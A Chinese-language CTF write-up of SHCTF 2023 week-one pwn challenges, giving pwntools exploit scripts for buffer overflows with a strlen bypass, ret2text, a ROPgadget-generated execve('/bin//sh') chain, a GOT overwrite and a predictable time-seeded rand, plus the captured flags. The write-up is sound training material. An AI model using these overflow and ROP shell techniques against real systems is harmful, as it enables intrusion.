SHCTF-Pwn

PWN

[WEEK1]nc

nc连接即可
image.png
flag{9528bc43-e3f4-4610-9019-73186897d17b}

[WEEK1]四则计算器

image.png
其它地方都没什么东西,只有这个gets(s)能溢出,但这还有一个strlen检查,检查到长度大于1就结束进程。所以应该想办法绕过这个strlen的检查。

由于白名单检查的时候,数据长度是由strlen函数提供的,而strlen函数的检查机制就是遇到NULL字符停止,但是又不能直接传入NULL字符作为开头,因为之后执行的时候会被认为是非法指令,所以说需要一个带NULL字符的合法指令放在开头,然后shellcode正常跟在后面就行

所以我们可以直接传递b'1'+b'\x00来绕过检测,接下来就是正常的栈溢出了。

1
2
3
4
5
6
7
8
9
10
11
12
from pwn import *
context.log_level="debug"
#conn=process('./alloc')
conn=remote('112.6.51.212',31856)
conn.recv()
offset = 0x30
func = 0x00000000004015DC
ret=0x000000000040101a
payload=b'1'+b'\x00' + offset * bytes("A", 'latin-1')
payload += p64(0)+p64(ret)+p64(func)
conn.sendline(payload)
conn.interactive()

[WEEK1]猜数游戏

image.png
看起来挺麻烦,实际上就是输入数字和服务器随机数比较,种子是time(0LL)。
直接套隔壁newstar week1脚本

1
2
3
4
5
6
7
8
9
10
11
12
from pwn import *
from ctypes import *
context.log_level = 'debug'
dll = CDLL('libc.so.6')
#io = process('./guess')
io = remote('112.6.51.212', 30364)
seed = dll.time(0)+1
dll.srand(seed)
io.recv()
io.sendline('11')
io.sendline(str(dll.rand()))
io.interactive()

对不上就多试几次

[WEEK1]hard nc

image.png
windows端nc进去一堆乱码,刚开始还给我看蒙了
image.png
base64解码即可获得flag的后半部分
5d-a837-53f8030adc9b}
image.png
ls -a能查看到隐藏文件,.gift就是flag的前半部分,组合即可得flag
flag{02dfe598-6722-4b5d-a837-53f8030adc9b}

[WEEK1]ropchain

非常好rop链,使我的ROPgadget启动
ROPgadget --binary "simplerop" --ropchain

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#!/usr/bin/env python3
# execve generated by ROPgadget
from pwn import *
from struct import pack
context.log_level="debug"
conn=remote("112.6.51.212",31885)
#conn = process('./simplerop')
# Padding goes here
p = b'a'*40

p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c0) # @ .data
p += pack('<Q', 0x0000000000419a1c) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000041ac41) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000417e25) # xor rax, rax ; ret
p += pack('<Q', 0x000000000041ac41) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000401d1d) # pop rdi ; ret
p += pack('<Q', 0x000000000049d0c0) # @ .data
p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000401858) # pop rdx ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000417e25) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000450860) *59 # add rax, 1 ; ret
p += pack('<Q', 0x0000000000401243) # syscall
conn.recv()
conn.send(p)
conn.interactive()

image.png

[WEEK1]口算题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from pwn import *
conn = remote('112.6.51.212', 30295)

# 接收欢迎信息
conn.recvuntil(b'Press Enter to start...')
conn.sendline()
conn.recvline()
question = conn.recvline().decode().strip()
parts = question.split('=')
string=parts[0].replace('×', '*')
string=string.replace('÷', '/')
conn.sendline(str(eval(string)))

for i in range(199):
conn.recvline()
conn.recvline()
question = conn.recvline().decode().strip()
parts = question.split('=')
string=parts[0].replace('×', '*')
string=string.replace('÷', '/')
conn.sendline(str(eval(string)))

response = conn.recvall().decode().strip()
print(response)
conn.close()

image.png
这也算使pwn吗?

[WEEK1]babystack

re2text
先后找到字符串$0
image.png
main函数call了个_system
image.png
image.png

1
2
3
4
5
6
7
8
9
10
11
12
from pwn import *
context.log_level="debug"
conn=remote('112.6.51.212',31891)
conn.recv()
offset = 0x20
pop_rdi_ret=0x400833
func = 0x4007AE
sh=0x400858
payload=offset * bytes("A", 'latin-1')
payload += p64(0)+p64(pop_rdi_ret)+p64(sh)+p64(func)
conn.sendline(payload)
conn.interactive()

[WEEK1]showshowway

image.png
s下面就是y,字符串溢出就行
image.png
刚开始的时候我一直以为p0x4008BE,传半天不对开gdb后才发现这是地址,真正的字符串是showshowway

1
2
3
4
5
6
7
8
9
10
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
#conn=remote('112.6.51.212',32461)
conn=process('./showshowway')
conn.recv()
offset = 0x40
payload=offset * bytes("A", 'latin-1')
payload+=bytes('showshowway', 'latin-1')
conn.sendline(payload)
conn.interactive()

[WEEK1]pkmon

可以修改v1更改覆盖的位置
image.png
直接向上溢出修改got表,把put函数指向getflag函数image.png

1
2
3
4
5
6
7
8
9
10
from pwn import *
context.log_level="debug"
#conn=process('./pkmon')
conn=remote('112.6.51.212',31138)
conn.recv()
conn.sendline('0')
func = 0x000000000040072B
payload = p64(func)
conn.sendline(payload)
conn.interactive()

SHCTF-Pwn
http://example.com/2023/10/30/SHCTF-WP-PWN/
作者
pjx1314
发布于
2023年10月30日
许可协议